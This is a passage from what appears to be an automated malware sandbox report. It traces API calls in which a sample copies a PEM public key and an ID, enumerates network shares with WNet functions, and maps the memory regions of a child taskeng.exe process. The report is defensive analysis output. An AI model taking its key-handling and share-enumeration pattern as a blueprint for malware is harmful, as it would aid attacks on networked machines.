KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0102.448] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0102.449] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf21b8 | out: hHeap=0x5f0000) returned 1 [0102.467] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0102.467] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.468] lstrcpyA (in: lpString1=0xf35ab78, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0102.468] lstrcpyA (in: lpString1=0xf35a778, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0102.468] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0102.468] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf6498 | out: hHeap=0x5f0000) returned 1 [0102.468] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0102.468] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.468] lstrlenW (lpString="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 40 [0102.490] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be8190 | out: hHeap=0x5f0000) returned 1 Thread: id = 76 os_tid = 0xf54 [0102.889] timeGetTime () returned 0xe69292 [0102.889] GetLastError () returned 0x54f [0102.889] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3bc) returned 0x2be8190 [0102.889] GetCurrentThreadId () returned 0xf54 [0102.889] SetLastError (dwErrCode=0x54f) [0102.889] Sleep (dwMilliseconds=0x1339e0) Thread: id = 77 os_tid = 0xf58 [0102.896] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x935fee0 | out: lphEnum=0x935fee0*=0x2be0eb0) returned 0x0 [0103.684] WNetEnumResourceW (in: hEnum=0x2be0eb0, lpcCount=0x935fedc, lpBuffer=0x2c3c5e8, lpBufferSize=0x935fed8 | out: lpcCount=0x935fedc, lpBuffer=0x2c3c5e8, lpBufferSize=0x935fed8) returned 0x0 [0103.684] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c090 [0103.684] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c0d8 [0103.684] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x70) returned 0x2b601a0 [0103.684] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c120 [0103.684] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c168 [0103.684] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2c3c5e8, lphEnum=0x935fe28 | out: lphEnum=0x935fe28*=0x2b84648) returned 0x0 [0103.690] WNetEnumResourceW (in: hEnum=0x2b84648, lpcCount=0x935fe24, lpBuffer=0x2c405f0, lpBufferSize=0x935fe20 | out: lpcCount=0x935fe24, lpBuffer=0x2c405f0, lpBufferSize=0x935fe20) returned 0x103 [0103.690] WNetCloseEnum (hEnum=0x2b84648) returned 0x0 [0103.690] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6c0d8 | out: hHeap=0x5f0000) returned 1 [0103.691] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6c090 | out: hHeap=0x5f0000) returned 1 [0103.691] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c090 [0103.691] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c0d8 [0103.691] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe0) returned 0x2bbc668 [0103.691] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c1b0 [0103.691] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c1f8 [0103.692] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6c168 | out: hHeap=0x5f0000) returned 1 [0103.692] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6c120 | out: hHeap=0x5f0000) returned 1 [0103.692] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b601a0 | out: hHeap=0x5f0000) returned 1 [0103.692] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c120 [0103.693] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6c168 [0103.693] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2c3c608, lphEnum=0x935fe28) Process: id = "7" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x42d45000" os_pid = "0xf5c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x368" cmd_line = "taskeng.exe {A8BF3165-284D-4CC5-A9C0-085226D2A680} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1189 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1190 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1191 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1192 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1193 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1194 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1195 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1196 start_va = 0xffec0000 end_va = 0xfff33fff monitored = 0 entry_point = 0xffecf44c region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 1197 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1198 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1199 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1200 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1201 start_va = 0x50000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1202 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1203 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1204 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1205 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1206 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1207 start_va = 0x1f0000 end_va = 0x256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1208 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1209 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1210 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1211 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1212 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1213 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1214 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1215 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1216 start_va = 0x7fefa290000 end_va = 0x7fefa299fff monitored = 0 entry_point = 0x7fefa29260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1217 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1218 start_va = 0x260000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1219 start_va = 0x330000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1220 start_va = 0x260000 end_va = 0x288fff monitored = 0 entry_point = 0x261010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1221 start_va = 0x320000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1222 start_va = 0x430000 end_va = 0x5b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1223 start_va = 0x260000 end_va = 0x288fff monitored = 0 entry_point = 0x261010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1224 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1225 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1226 start_va = 0x5c0000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1227 start_va = 0x750000 end_va = 0x1b4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1228 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 1229 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1230 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1231 start_va = 0x70000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1232 start_va = 0x1b50000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 1233 start_va = 0x260000 end_va = 0x2dcfff monitored = 0 entry_point = 0x26cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1234 start_va = 0x260000 end_va = 0x2dcfff monitored = 0 entry_point = 0x26cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1235 start_va = 0x7fefcb60000 end_va = 0x7fefcb6efff monitored = 0 entry_point = 0x7fefcb61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1236 start_va = 0x7fefec50000 end_va = 0x7fefec6efff monitored = 0 entry_point = 0x7fefec560e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1237 start_va = 0x1d10000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 1238 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1239 start_va = 0x7fefe7b0000 end_va = 0x7fefe88afff monitored = 0 entry_point = 0x7fefe7d0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1240 start_va = 0x7fefc560000 end_va = 0x7fefc577fff monitored = 0 entry_point = 0x7fefc563b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1241 start_va = 0x260000 end_va = 0x2a4fff monitored = 0 entry_point = 0x261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1242 start_va = 0x260000 end_va = 0x2a4fff monitored = 0 entry_point = 0x261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1243 start_va = 0x260000 end_va = 0x2a4fff monitored = 0 entry_point = 0x261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1244 start_va = 0x260000 end_va = 0x2a4fff monitored = 0 entry_point = 0x261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1245 start_va = 0x260000 end_va = 0x2a4fff monitored = 0 entry_point = 0x261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1246 start_va = 0x7fefc260000 end_va = 0x7fefc2a6fff monitored = 0 entry_point = 0x7fefc261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1247 start_va = 0x7fefe890000 end_va = 0x7fefe900fff monitored = 0 entry_point = 0x7fefe8a1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1248 start_va = 0x260000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1249 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1250 start_va = 0x7fefcb30000 end_va = 0x7fefcb54fff monitored = 0 entry_point = 0x7fefcb39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1251 start_va = 0x1d90000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 1252 start_va = 0x2010000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1253 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1254 start_va = 0x2090000 end_va = 0x235efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1255 start_va = 0x7fefcc50000 end_va = 0x7fefcc63fff monitored = 0 entry_point = 0x7fefcc510e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1256 start_va = 0x1b70000 end_va = 0x1beffff monitored = 1 entry_point = 